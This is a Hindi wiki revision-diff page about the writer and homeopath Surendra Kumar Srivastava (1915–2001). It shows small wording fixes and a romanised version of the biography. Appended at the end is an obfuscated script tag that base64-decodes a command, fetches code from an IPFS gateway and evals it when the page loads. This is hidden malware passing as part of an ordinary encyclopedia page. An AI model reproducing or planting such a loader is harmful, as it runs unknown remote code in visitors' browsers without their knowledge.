Difference between revisions of "सुरेन्द्र कुमार श्रीवास्तव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''सुरेन्द्र कुमार श्रीवास्तव''' (जन्म- 10 फ़रवरी, 1915, [[...' के साथ नया पन्ना बनाया)
 
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
'''सुरेन्द्र कुमार श्रीवास्तव''' (जन्म- [[10 फ़रवरी]], [[1915]], [[गोरखपुर]], [[उत्तर प्रदेश]]; मृत्यु- [[2001]], [[काशी]]) जाने-माने लेखक थे। इनकी प्रगतिशील रचनाएँ 'हंस' और 'पुर्वांचल' में प्रकाशित हुई थीं।<ref>{{cite web |url=http://www.kashikatha.com/%E0%A4%B5%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A5%8D%E0%A4%A4%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%B5/%E0%A4%B8%E0%A4%BE%E0%A4%B9%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A4%BE%E0%A4%B0/|title=काशी के साहित्यकार|accessmonthday=13 जनवरी |accessyear=2014|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
'''सुरेन्द्र कुमार श्रीवास्तव''' (जन्म- [[10 फ़रवरी]], [[1915]], [[गोरखपुर]], [[उत्तर प्रदेश]]; मृत्यु- [[2001]], [[काशी]]) जाने-माने लेखक थे। इनकी प्रगतिशील रचनाएँ 'हंस' और 'पूर्वांचल' में प्रकाशित हुई थीं।<ref>{{cite web |url=http://www.kashikatha.com/%E0%A4%B5%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A5%8D%E0%A4%A4%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%B5/%E0%A4%B8%E0%A4%BE%E0%A4%B9%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A4%BE%E0%A4%B0/|title=काशी के साहित्यकार|accessmonthday=13 जनवरी |accessyear=2014|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
  
*[[उत्तर प्रदेश]] के को गोरखपुर में जन्मे सुरेन्द्र कुमार की प्रगतिशील रचनाएँ उल्लेखनीय हैं।
+
*[[उत्तर प्रदेश]] के [[गोरखपुर]] में जन्मे सुरेन्द्र कुमार की प्रगतिशील रचनाएँ उल्लेखनीय हैं।
 
*ये एक सिद्ध होम्योपैथिक चिकित्सक भी थे।
 
*ये एक सिद्ध होम्योपैथिक चिकित्सक भी थे।
 
*सुरेन्द्र कुमार श्रीवास्तव के जनवादी स्वर में ‘अस्थि पंजर अवशेष’ में दीन दुखियों के क्रंदन के शब्द चित्र बखूबी उभर कर प्रकट होते हैं।
 
*सुरेन्द्र कुमार श्रीवास्तव के जनवादी स्वर में ‘अस्थि पंजर अवशेष’ में दीन दुखियों के क्रंदन के शब्द चित्र बखूबी उभर कर प्रकट होते हैं।
*नई पीढ़ी के रचनाकारों को सदैव नवसृजन की प्रेरणा सुरेन्द्र कुमार श्रीवास्तव से देते थे।
+
*नई पीढ़ी के रचनाकारों को सदैव नवसृजन की प्रेरणा सुरेन्द्र कुमार श्रीवास्तव देते थे।
 
*सन [[2001]] में काशी (वर्तमान [[बनारस]]) में इनका निधन हो गया।
 
*सन [[2001]] में काशी (वर्तमान [[बनारस]]) में इनका निधन हो गया।
  

Latest revision as of 12:18, 11 February 2020

surendr kumar shrivastav (janm- 10 faravari, 1915, gorakhapur, uttar pradesh; mrityu- 2001, kashi) jane-mane lekhak the. inaki pragatishil rachanaean 'hans' aur 'poorvaanchal' mean prakashit huee thian.[1]

  • uttar pradesh ke gorakhapur mean janme surendr kumar ki pragatishil rachanaean ullekhaniy haian.
  • ye ek siddh homyopaithik chikitsak bhi the.
  • surendr kumar shrivastav ke janavadi svar mean ‘asthi panjar avashesh’ mean din dukhiyoan ke krandan ke shabd chitr bakhoobi ubhar kar prakat hote haian.
  • nee pidhi ke rachanakaroan ko sadaiv navasrijan ki prerana surendr kumar shrivastav dete the.
  • san 2001 mean kashi (vartaman banaras) mean inaka nidhan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. kashi ke sahityakar (hindi). . abhigaman tithi: 13 janavari, 2014.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>